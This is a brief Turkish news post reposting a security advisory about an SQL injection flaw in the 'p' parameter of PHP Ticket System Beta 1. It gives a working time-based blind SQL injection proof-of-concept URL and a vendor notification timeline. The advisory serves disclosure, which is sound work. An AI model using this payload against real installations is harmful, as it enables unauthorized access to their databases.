PHP Ticket System SQL Injection Açığı
Php destek (ticket system) sisteminde bir sql injection açığı bulunmuş. Yazılımın henüz beta olması nedeniyle bu tür açıkların daha fazla olacağı aşikar, tavsiyemiz beta sürümleri gerçek sistmelerde kullanmamanız.
# Exploit Title: PHP Ticket System Beta 1 'p' SQL Injection # Date: 04/16/12 # Author: G13 # Twitter: @g13net # Software Site: # Version: Beta 1 # Category: webapp (php) # ##### Description ##### PHP Ticket System is a small PHP MySQL trouble ticket or work ordersystem that is a work in progress. ##### Vulnerability ##### The 'p' parameter on index.php is vulnerable to SQL Injection. A user must be signed in to perform this attack. ##### Exploit ##### http://localhost/index.php?p=[SQLi]&id=211&_=1334627588812 ##### PoC ##### http://localhost/index.php?p=edit_ticket' AND SLEEP(5) AND 'yoUg'='yoUg&id=211&_=1334627588812 ##### Vendor Notification ##### 4/16/12 - Vendor Notified 4/17/12 - Vendor reponse, will be fixed in next release 4/24/12 - Disclosure
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